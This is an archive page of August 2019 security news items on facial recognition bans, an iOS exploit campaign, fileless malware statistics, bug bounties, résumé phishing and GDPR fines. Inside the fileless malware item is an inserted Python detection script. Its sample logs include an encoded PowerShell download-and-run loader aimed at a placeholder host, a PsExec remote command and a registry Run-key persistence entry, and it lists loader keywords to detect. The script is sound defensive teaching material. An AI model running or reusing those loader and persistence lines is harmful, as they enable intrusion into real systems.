
Archive for August 2019

Municipal Government Calls For Facial Recognition Ban

Brookline has become the third Massachusetts municipality to call for a ban on the use of facial recognition technology by a municipal government. 

The proposed ban, put forward in a warrant article by town meeting member Amy Hummel, is likely to be considered by town representatives in November.

A statement in support of Hummel’s proposal was issued by the Massachusetts branch of the American Civil Liberties Union (ACLU), which recently launched the Press Pause on Face Surveillance campaign. An ACLU-backed bill currently before Massachusetts legislators proposes a statewide moratorium on the government's use of facial recognition technology.

Kade Crockford, director of the Technology for Liberty Program at ACLU Massachusetts, said: “For too long, face surveillance technology has gone unregulated, posing a serious threat to our basic civil rights and civil liberties. In the absence of state or national action, municipal governments have taken the first steps towards sensible policy.”

Somerville was the first city in Massachusetts to come out against the technology. A proposal to ban its use in police investigations and municipal surveillance programs was passed by Somerville City Council in June by a vote of 11 to 0. 

Last month the city of Cambridge joined the party when Mayor Marc McGovern proposed a ban on the use of facial recognition technology in the city.  

These three New England cities aren't alone in their rejection of this particular type of tech. In May this year San Francisco banned the use of facial recognition technology by the police and other agencies, while Oakland, California, City Council last month voted unanimously to ban the use of facial recognition by city departments, and Berkeley is considering following suit. 

A bill to place a five-year moratorium on police using facial-recognition technology is currently under consideration in Michigan, and the tech has raised concerns at a national level too.

In July the U.S. House of Representatives passed an amendment to the Intelligence Authorization Act for Fiscal Year 2020 that requires the director of national intelligence to report on the U.S. government's use of facial recognition technology, detailing its accuracy, its efforts to protect human and civil rights, and its potential consequences for those rights.

There is an argument to be made for the use of facial recognition technology by the government to secure airports and border installations, but it remains to be seen how the growing concerns over its impact on the freedom of the general public will play out in the U.S. at municipal and state level.

Source: Information Security Magazine

Hack Exploited Apple Users for Two Years

Researchers from Google's Project Zero have discovered a threat campaign that operated against users of Apple iOS devices for two years. 

Earlier this year Google's Threat Analysis Group (TAG) discovered that a small collection of hacked websites was being used to carry out indiscriminate watering-hole attacks against visitors, using iPhone zero-days.  

Victims were ensnared just by visiting one of the hacked websites, which are estimated to have attracted thousands of visitors per week. This simple action alone was enough to inadvertently trigger an exploit server to attempt to install a monitoring implant on the user's device.

Hackers exploited flaws in iPhone software to stealthily take over a victim's device and access a user's contact info, media files and GPS location, together with data from Instagram, WhatsApp, Telegram and Gmail.

TAG collected five separate, complete and unique iPhone exploit chains, covering most versions of the device from iOS 10 through to the most recent version, iOS 12. 

"This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years," said Project Zero's Ian Beer.

He went on to say that investigations into the root causes of the vulnerabilities revealed code that appeared to have never worked correctly, had missed the quality assurance checks or "likely had little testing or review before being shipped to users."

TAG found 14 different software flaws, seven of which affected the iPhone's Safari web browser. The group reported the issues to Apple with a seven-day deadline on February 1, 2019, which resulted in the out-of-band release of iOS 12.1.4 on February 7, 2019. 

After summarizing the findings, Beer warned users to wise up to the very real threat of cyber-attacks and to consider where the data they constantly put into their devices may one day end up.    

He said: "The reality remains that security protections will never eliminate the risk of attack if you're being targeted. 

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives yet also as devices which, when compromised, can upload their every action into a database to potentially be used against them."

Source: Information Security Magazine

Biometric ID Cards Ahoy!

India is introducing biometric identity cards to keep tabs on the country's rapidly growing number of seafarers.

Recent years have seen an unprecedented 43% increase in the number of seafarers in India, from 108,446 in 2013 to 154,349 in 2018. And India, according to the International Chamber of Shipping, is currently the world's third-biggest supplier of seafaring officers. 

This vigorous growth follows various policy changes brought in by the Indian government between 2014 and 2018, including the lifting of bans on the introduction of new training courses and the opening of new maritime training institutes.

The new ID cards, dubbed Biometric Seafarer Identity Documents, will use facial biometric recognition technology and come with two optical security features: micro prints/micro texts and a unique guilloche pattern.

Each of India's approximately 350,000 seafarers who hold a valid Continuous Discharge Certificate is eligible for the new BSID, which will be rolled out over the next two years. 

The cards will carry an inbuilt chip that can be read at point-of-sale readers and ATMs and by immigration officers with the right gear. 

To make the cards, data will be captured to create a map of the seafarer's face, which will then be cross-matched with their passport photo using software designed by the Centre for Development of Advanced Computing (C-DAC) in Mumbai. The information captured will be fed into a national database, which will be accessible worldwide. 

Indian minister of shipping Mansukh Lal Mandaviya said: “The new document will give a foolproof identification to our seafarers which will facilitate their movement, provide ease of getting jobs and help in identifying them from any location in the world.”

Eight centers have been set up in coastal locations around the country at Mumbai, Kolkata, Chennai, Goa, New Mangalore, Kochi, Vizag and Kandla to issue the cards. A ninth center has also been established in Noida, which lies roughly 1,000 km inland near New Delhi.

Source: Information Security Magazine

Fileless Malware Detections Soar 265% in 2019

Fileless malware, BEC, digital extortion and ransomware attacks all grew significantly between 2018 and the first six months of this year, according to new data from Trend Micro.

The security giant blocked over 26.8 billion threats in the first half of the year, over 90% of which were email-borne, according to its mid-year roundup report, Evasive Threats, Pervasive Effects.

Of these detections, it spotted a massive 265% year-on-year increase in fileless techniques designed to stay hidden from traditional tools, by executing in a system’s memory, residing in the registry, or abusing legitimate tools.

Although cryptocurrency mining was the most detected threat in 1H 2019, the more eye-catching growth in detection went to digital extortion attempts, which jumped 319% from the second half of 2018, and BEC, which increased 52% over the same period.

Ransomware is also back on the rise, with related files, emails and URLs recording a 77% increase on the previous six months.

Although the number of new ransomware families dropped by 55% over the period, there were concerning signs of existing variants containing destructive capabilities beyond file encryption.

Ryuk can prevent infected systems from even rebooting, for example, while LockerGoga also modifies user account passwords. Some, such as BitPaymer, use fileless techniques such as abuse of the common PsExec tool.

One surprise from the report was the re-emergence of exploit kits, which recorded a 136% increase compared to the first half of 2018, although the volume of detections at 321,000 is far below the peak activity observed three or four years ago.

These have also been observed in conjunction with fileless techniques.

“One notable exploit kit from the first half of 2019 was Greenflash Sundown, which was used by the ShadowGate campaign through an upgraded version capable of living off the land, that is, using an updated PowerShell loader to filelessly execute the payload,” the report explained.
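The three fileless behaviours the report describes (a hidden, encoded PowerShell loader living off the land, abuse of the legitimate PsExec tool, and payloads that reside in the registry) are the kind of thing a detection engineer would hunt for in process-creation telemetry. The following Python detector is an added example, not code from Trend Micro or the article; the `user|parent|image|command_line` log layout, the indicator lists and every sample line are constructed assumptions, and the decoded loader points at a reserved `.invalid` hostname.

```python
"""Added example: flag fileless-style process-creation events.

Not from the Trend Micro report or the article. The log layout
("user|parent|image|command_line"), the indicator lists and the sample
lines below are constructed assumptions for illustration only.
"""
import base64
import re

# Constructed: a loader of the living-off-the-land kind the report describes,
# encoded the way PowerShell's -EncodedCommand expects (UTF-16LE, then base64).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/stage2')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed sample events in the assumed "user|parent|image|command_line" layout.
SAMPLE_LOGS = [
    "alice|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt",
    "alice|winword.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    f"powershell.exe -nop -w hidden -enc {_ENC}",
    "svc_backup|cmd.exe|C:\\Tools\\PsExec.exe|PsExec.exe \\\\FILESRV01 -s -d cmd.exe /c whoami",
    "bob|cmd.exe|C:\\Windows\\System32\\reg.exe|reg add HKCU\\Software\\Microsoft\\Windows"
    "\\CurrentVersion\\Run /v Updater /t REG_SZ /d \"powershell -w hidden -c "
    "Get-ItemProperty HKCU:\\Software\\Acme | IEX\"",
    "carol|services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
]

# Tokens that mark a PowerShell loader fetching or unpacking a payload in memory.
SUSPICIOUS_PS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "frombase64string", "get-itemproperty",
)
# Office parents spawning PowerShell is a classic macro-to-loader handoff.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Autostart registry key: a payload "residing in the registry" usually needs one.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(event):
    """Return (user, image basename, list of reasons) for one log line."""
    user, parent, image, cmdline = event.split("|", 3)
    exe = image.rsplit("\\", 1)[-1].lower()
    lowered = cmdline.lower()
    reasons = []

    if exe == "powershell.exe":
        if "-w hidden" in lowered or "-windowstyle hidden" in lowered:
            reasons.append("hidden-window powershell")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits = [t for t in SUSPICIOUS_PS_TOKENS if t in decoded.lower()]
            if hits:
                reasons.append("encoded loader: " + ", ".join(hits))
        if parent.lower() in OFFICE_PARENTS:
            reasons.append(f"spawned by {parent}")

    elif exe == "psexec.exe":
        # Legitimate admin tool; remote SYSTEM-level execution is the abuse pattern.
        if "\\\\" in cmdline and " -s" in lowered:
            reasons.append("psexec remote execution as SYSTEM")

    elif exe == "reg.exe" and RUN_KEY.search(cmdline):
        reasons.append("run-key persistence")
        if "powershell" in lowered:
            reasons.append("run key launches powershell")
        if "get-itemproperty" in lowered:
            reasons.append("payload staged in registry value")

    return user, exe, reasons


def scan(lines):
    """Return one finding dict per event that tripped at least one indicator."""
    findings = []
    for line in lines:
        user, exe, reasons = classify(line)
        if reasons:
            findings.append({"user": user, "image": exe, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['user']:<12}{f['image']:<16}{'; '.join(f['reasons'])}")
```

Running the block prints three findings (the PowerShell loader, the PsExec launch and the Run-key write) and stays silent on the notepad and svchost events. The decoding step matters: the indicator tokens only appear after the base64/UTF-16LE layer is removed, which is exactly why an encoded loader slips past naive string matching on the raw command line.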

The volume of threats blocked by Trend Micro in the first half of 2019 increased by around six billion from the same time last year, which could signal either a ramp-up in cybercrime activity or improved detection.

Source: Information Security Magazine

HackerOne Announces Five New $1m White Hats

The UK has its first $1 million white hat hacker, after bug bounty platform HackerOne announced five new security researchers had reached the milestone.

The five millionaire hackers are: Mark Litchfield (@mlitchfield) from the UK, Nathaniel Wakelam (@nnwakelam) from Australia, Frans Rosen (@fransrosen) from Sweden, Ron Chan (@ngalog) from Hong Kong, and Tommy DeVoss (@dawgyg) from the US.

They join 19-year-old Argentinian Santiago Lopez, known as @try_to_hack, whose efforts were announced back in March.

“Hacking can open doors to anyone with a laptop and curiosity about how to break things,” said Litchfield. “I hope our achievements will encourage other hackers, young and old, to test their skills, become part of our supportive community, rake in some extra $$$s along the way and make the internet a much safer place for people.”

Some $21m has been paid out via HackerOne to researchers over the past year, an increase of $10m on the previous 12 months.

The platform claimed that Russian, Indian and US researchers account for over a third (36%) of awarded bounties. However, as today’s news illustrates, there are clearly opportunities for white hats from all regions.

HackerOne claimed a top researcher can earn over 40 times the annual median wage in Argentina and more than six times that of Sweden.

However, MIT research released in January painted a different picture, revealing that it’s difficult to make good money as an ethical hacker and that talented white hats could live better as pen testers or in-house researchers.

It studied 61 HackerOne bounty programs over 23 months — including ones run for Twitter, Coinbase, Square and Facebook.

The top seven participants in the Facebook program made just $34,255 per year from an average of 0.87 bugs per month, while from the entire HackerOne dataset it was estimated that participants made just $16,544 from 1.17 bugs per month.

HackerOne argued in response to Infosecurity that the data analyzed in the study was not representative.

Source: Information Security Magazine

Phishing Campaign Hides Malware in Resumes

For many people, applying for a new job is a soul-crushing activity on a par with cleaning the bathroom in a six-person student dorm room. 

Landing a new role can mean spending hours searching for positions, rewriting your résumé and cover letter countless times and using LinkedIn to badger people you haven't spoken to for years into giving you a reference. 

Now cyber-criminals have given job seekers a fresh obstacle to contend with after targeting companies with a phishing campaign that hides malware in résumés sent as email attachments.

The advanced campaign, which uses multiple anti-analysis methods to deliver the Quasar remote access tool (RAT), was uncovered by phishing defense service provider Cofense Intelligence.

Quasar RAT by itself isn't dodgy, but this legitimate open-source remote administration tool that can be found on GitHub has a history of being abused.

“This campaign is concerning as the US-CERT identifies the Quasar RAT as a favored tool of advanced persistent threat actors. This means that the most dedicated cyber-criminals are seeking to utilize this tool to exploit networks," said Carl Wearn, head of e-crime at Mimecast.

From the outside the campaign appeared simple, but a closer look showed that the threat actors had done their homework. First, they used an easily accessible tool that makes attributing the campaign to a specific threat actor as easy as teaching a rhino the clarinet. 

Second, they laced the résumé attachment document being used to deliver Quasar RAT with a multitude of measures designed to deter detection, including password protection and encoded macros. 

Announcing its find, Cofense said that "educating employees on new phishing trends is the best way of countering a campaign such as this."

Wearn added: "I would urge individuals, particularly those working within HR departments and used to receiving résumés or CVs, to be particularly vigilant for this form of attack. Organizations should ensure they have an up-to-date antivirus solution that can effectively resolve and detect this form of attack.”

Source: Information Security Magazine

Facial Recognition Technology Creates a Fine Mess in Sweden

Student attendance is an issue in Sweden. A 2015 report by the Organisation for Economic Co-operation and Development (OECD) found Sweden to have "one of the largest proportions of students who arrive late for school among OECD countries." 

Schools in the nation's capital have struggled to get students to show up at all. A 2016 study of 58 schools in Stockholm found that a third of students (33.5%) admitted to playing truant for at least one day during the current academic year.

A new attendance problem came to light this week when a school in the northern municipality of Skellefteå was fined by the Swedish Data Protection Authority (DPA) for trialing facial recognition technology on its students without valid consent. 

In a project dubbed Future Classroom, Anderstorp High School teamed up with Nordic software and services company Tieto to test automatic student registration using tags, smartphone apps and facial recognition technology over a three-week period in the last quarter of 2018. 

The aim of the project, which involved 22 students, was to give back to teachers at the high school the 17,280 hours they spend each year registering students in lessons.

The Swedish DPA issued Skellefteå municipality with the country’s first GDPR violation fine after concluding that the project violated articles 5, 9, 35 and 36. The amount was set at 200,000 SKr (approximately $20,000) out of a maximum 10,000,000 SKr that can be imposed on public authorities under Swedish law.

Consent was obtained from students who participated in the project; however, the Swedish DPA found that a consensual agreement could not provide a valid legal basis "given the clear imbalance between the data subject and the controller."

Tommy Lindmark, IT strategist for Skellefteå municipality, told Infosecurity Magazine: “I was surprised by the [DPA’s] decision and think that our work has been very well done. But the issue is sensitive in Sweden and legislation and technological development are not keeping pace.

“I hope that we can get law and technology to work together so that we can make the public sector more efficient.”

The fact that the DPA only learned about the Future Classroom project after it was covered by Swedish national TV was a deciding factor in determining how steep the fine should be. 

Jenny Bård, legal advisor to the Swedish DPA, told Infosecurity Magazine that working in the school's favor was the fact that the test had only involved 22 pupils for a short time.

"On the other end," said Bård, "there has been a disproportionate registration lacking legal ground, and the municipality (controller of the public school) has not enough considered the high risks related to the test. 

"Children have been registered with special categories of data. And the information has reached the DPA only through media. The amount has in this case been considered to be effective, proportionate and dissuasive."

The DPA fine has not quashed efforts to introduce automatic student registration into Skellefteå’s schools. 

Lindmark said: “We have a clear consent and right now we are thinking about how to proceed. The question is what does consent mean? To be continued.”

Tieto project manager Fredrika Ling said: “Tieto is now analyzing this situation together with the municipality. It is important to create a good environment with clear frameworks for this type of projects for the future to enable innovation and use of latest technologies for better services.”

Source: Information Security Magazine

Drained Batteries? These Stealth Ad-Clicking Apps Could Be to Blame

If you didn't think it was possible for ads to become any more infuriating, then you are a) optimistic and b) wrong. 

Cybersecurity firm Symantec has discovered two malicious apps in which hidden ads are being automatically clicked to generate revenue for threat actors.  

This newly discovered tactic uses embedded advertisements – strategically positioned beyond a mobile device’s viewable screen area – to initiate an automated ad-click process. 

The ghost-clicking action, which goes on out of sight and without the knowledge of the device user, drains batteries, slows performance and potentially increases mobile data usage by secretly sending the user on frequent visits to websites connected with the ads.

This underhanded sneakery was spotted taking place on devices that had downloaded the notepad app Idea Note and the fitness app Beauty Fitness, both of which were available on the Google Play Store. 

The apps, published by a developer known as Idea Master, have a collective download count of 1.5 million users. 

The cunning creators of the apps packed them using legitimate packers originally developed to protect the intellectual property of Android applications. Android packers can change the entire structure and flow of an Android Package Kit (APK) file, making it difficult for security researchers who want to decipher the APK’s behavior. 

This complexity in design, together with the hidden nature of the ad clicking, allowed the apps' malicious activities to go unnoticed on Google Play for nearly a year.

Symantec has informed Google of the observed behavior and the apps have now been removed from the Play Store.

Users of Idea Note: OCR Text Scanner, GTD, Color Notes and Beauty Fitness: daily workout, best HIIT coach are advised to manually uninstall them from their devices. 

A spokesperson for Symantec advised app users to only install apps from trusted sources and to install a mobile security app to protect their device and data.

Source: Information Security Magazine

Global Breach Costs Set to Top $5 Trillion By 2024

The cost of global data breaches to victim organizations will rise to over $5 trillion by 2024 as regulatory fines take hold and firms become more dependent on digital systems, according to new predictions from Juniper Research.

The figures come from the UK-based market watcher’s latest report, The Future of Cybercrime & Security: Threat Analysis, Impact Assessment & Mitigation Strategies 2019-2024.

The firm claimed that breach costs will rise by 11% annually over the report period, from a figure of $3 trillion in 2019.

However, it argued that although mega-breaches of large volumes of data may make headlines they won’t necessarily impact costs directly, as fines and lost business aren’t closely linked to the size of a breach.

That’s somewhat at odds with data from IBM, which has been running a Cost of a Data Breach study for many years.

While the average global cost of a breach is now at $3.9m, it estimated that when incidents involve the compromise of over one million records this figure soars to $42m, while breaches of 50 million records are estimated to cost companies $388m on average.

Juniper claimed that AI will play an increasingly important role in cybercrime, enabling hackers to map the behavior of security systems to more easily circumvent defenses.

It also predicted that more attention will be paid to staff training and awareness in future, so that organizations can optimize their cybersecurity spending.

“All businesses need to be aware of the holistic nature of cybercrime and, in turn, act holistically in their mitigation attempts,” argued report author Susan Morrow. “As social engineering continues unabated, the use of human-centric security tactics needs to take hold in enterprise security.”

Franklyn Jones of Cequence Security argued that there may also be significant secondary costs to breaches beyond the headline $5 trillion figure.

“I’m referring to the growing number of malicious, automated bot attacks that are fueled by the billions of credentials stolen from these initial breaches,” he said. 

“Those secondary attacks, which are even harder to detect than the initial data breaches, tend to focus on business logic abuse, stolen IP, and financial fraud. The cost of these types of attacks is often under-reported, but is likely in the billions of dollars.”

Source: Information Security Magazine